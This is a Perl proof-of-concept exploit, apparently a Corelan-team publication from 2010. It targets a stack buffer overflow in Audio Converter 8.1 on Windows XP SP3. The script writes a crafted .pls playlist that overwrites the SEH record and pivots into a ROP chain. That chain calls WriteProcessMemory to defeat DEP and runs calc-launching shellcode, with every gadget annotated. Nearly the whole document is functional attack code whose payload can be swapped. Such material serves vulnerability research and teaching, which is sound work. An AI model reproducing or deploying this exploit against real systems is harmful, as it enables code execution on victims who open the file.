
# Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM
# Published : 2010-06-07
# Author : Sud0


#***********************************************************************************
# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM
# Date          : 07/06/2010
# Author        : Sud0
# Bug found by  : chap0
# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
# Version       : 8.1
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Thanks to my wife for her support
# Thanks to chap0 for bringing us the game
# Greetz to: Corelan Security Team
# mr_me you're killing the ROP bro :)
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Uses a ROP chain to bypass DEP: the chain calls WriteProcessMemory (WPM) to copy the shellcode into executable memory
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code. 
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
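use strict;
use warnings;

# Banner. Printed through a non-interpolating heredoc so the ASCII art is
# emitted exactly as written: in a double-quoted string "\/" and "\_" lose
# their backslash, and under `use warnings` "\_" raises
# "Unrecognized escape \_ passed through".
print <<'BANNER';
|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|

BANNER
print "[+] Exploit for .... \n";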

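# Output file: a .pls playlist carrying the overlong entry that overwrites
# the SEH record of the target (see "Type of vuln : SEH" above).
my $filename = "newaudio.pls";

# 26-byte payload: pushes the string "calc" (plus "   /") on the stack,
# takes its address into EAX and calls the absolute address 0x77C293C7.
# That address is hard-coded for the tested XP SP3 EN image (presumably a
# CRT/WinExec-style "run this command" routine - confirm before reusing).
my $shellcode = "\x8B\xEC\x55\x8B\xEC\x68\x20\x20\x20\x2F\x68\x63\x61\x6C\x63"
              . "\x8D\x45\xF8\x50\xB8\xC7\x93\xC2\x77\xFF\xD0";

# All ROP gadgets come from a module mapped at 0x10000000 (which DLL is not
# recorded on this page - presumably a non-rebased DLL shipped with the
# application; confirm with mona/pvefindaddr). The 0x7C80xxxx values are
# kernel32 on XP SP3 EN and change with OS, service pack and locale.
# pack('V') emits each value as the little-endian DWORD the stack expects.
my $mov_eax_ebp   = pack('V', 0x10002A31);   # mov eax,ebp / pop ebp / retn 4
my $add_eax_100   = pack('V', 0x1007A41D);   # add eax,100 / pop ebp / retn  (debugger shows hex)
my $pop_edi       = pack('V', 0x10008D00);   # pop edi / retn
my $add_esp_4     = pack('V', 0x100012B6);   # add esp,4 / retn
my $add_esp_14    = pack('V', 0x10002105);   # add esp,14 / retn
my $patch_lpbuf   = pack('V', 0x10028479);   # mov dword ptr ss:[esp+10],eax / call edi
my $wpm           = pack('V', 0x7C802213);   # kernel32!WriteProcessMemory (XP SP3 EN)
my $wpm_dest      = pack('V', 0x7C8022CF);   # destination: inside kernel32, 0xBC bytes past the WPM entry
my $bytes_written = pack('V', 0x0045A000);   # writable DWORD for lpNumberOfBytesWritten
my $seh_gadget    = pack('V', 0x1001372F);   # add esp,878 / retn 8 - replaces the SEH handler

# Stage 1: get the shellcode address into EAX. EBP (whatever the frame
# pointer holds when the chain starts) is copied into EAX and bumped nine
# times by 0x100 - the author-tuned distance from that frame to $shellcode.
my $buffer  = "A" x 280;                        # filler up to the first gadget
$buffer    .= $mov_eax_ebp;
$buffer    .= "B" x 12;                         # eaten by pop ebp / retn 4
$buffer    .= $add_eax_100 . "B" x 8;           # first add; 8 bytes eaten
$buffer    .= ($add_eax_100 . "B" x 4) x 8;     # eight more: EAX = EBP + 0x900

# Stage 2: EDI <- add esp,4 gadget; skip 20 bytes of filler; store EAX into
# the lpBuffer slot of the WPM frame below, then CALL EDI. The return
# address pushed by the call is discarded by add esp,4 and its retn lands
# on $wpm.
$buffer .= $pop_edi;
$buffer .= $add_esp_4;                          # popped into EDI
$buffer .= $add_esp_14;
$buffer .= "B" x 20;                            # skipped by add esp,14
$buffer .= $patch_lpbuf;

# Stage 3: WriteProcessMemory(-1, dest, lpBuffer, nSize, &written).
# hProcess -1 is the current-process pseudo handle. The destination sits
# inside kernel32 just past the WPM entry; presumably the write lands in
# WPM's own code path so the copied shellcode runs as WPM continues, which
# is why the author treats the post-WPM return slot as a don't-care.
# Verify that in a debugger before relying on it.
$buffer .= $wpm;
$buffer .= pack('V', 0xFFFFFFFF);               # return address after WPM (don't-care per the author)
$buffer .= pack('V', 0xFFFFFFFF);               # hProcess: -1 = current process
$buffer .= $wpm_dest;                           # lpBaseAddress
$buffer .= "B" x 4;                             # lpBuffer: overwritten with EAX in stage 2
$buffer .= pack('V', length $shellcode);        # nSize: derived from the payload (0x1A), not hard-coded
$buffer .= $bytes_written;                      # lpNumberOfBytesWritten: must point to writable memory
$buffer .= "B" x 12;
$buffer .= $shellcode;

# Stage 0 (runs first): the overwritten SEH handler at offset 4436 pivots
# ESP by 0x878 into the chain above. That offset is fixed by the target's
# stack layout, so refuse to build a file whose chain would push it.
my $seh_offset = 4436;
die sprintf("ROP chain + shellcode (%d bytes) exceed the SEH offset (%d)\n",
            length($buffer), $seh_offset)
    if length($buffer) > $seh_offset;
$buffer .= "B" x ($seh_offset - length($buffer));
$buffer .= $seh_gadget;                         # SEH handler: add esp,878 / retn 8
$buffer .= "A" x 10000;                         # trailing filler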

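# Write the payload to disk.
# The original shelled out to cmd.exe's "del" (Windows-only, result
# ignored) and used a 2-arg, unchecked open without binmode. ">" already
# truncates, so the unlink only preserves the old "remove then create"
# behaviour; binmode matters because any 0x0A in the chain would otherwise
# be rewritten as CR LF by text-mode translation on Windows.
print "Removing old $filename file\n";
if (-e $filename) {
    unlink $filename or warn "Could not remove $filename: $!\n";
}
print "Creating new $filename file\n";
open my $out, '>', $filename
    or die "Cannot open $filename for writing: $!\n";
binmode $out;
print {$out} $buffer
    or die "Write to $filename failed: $!\n";
close $out
    or die "Close of $filename failed: $!\n";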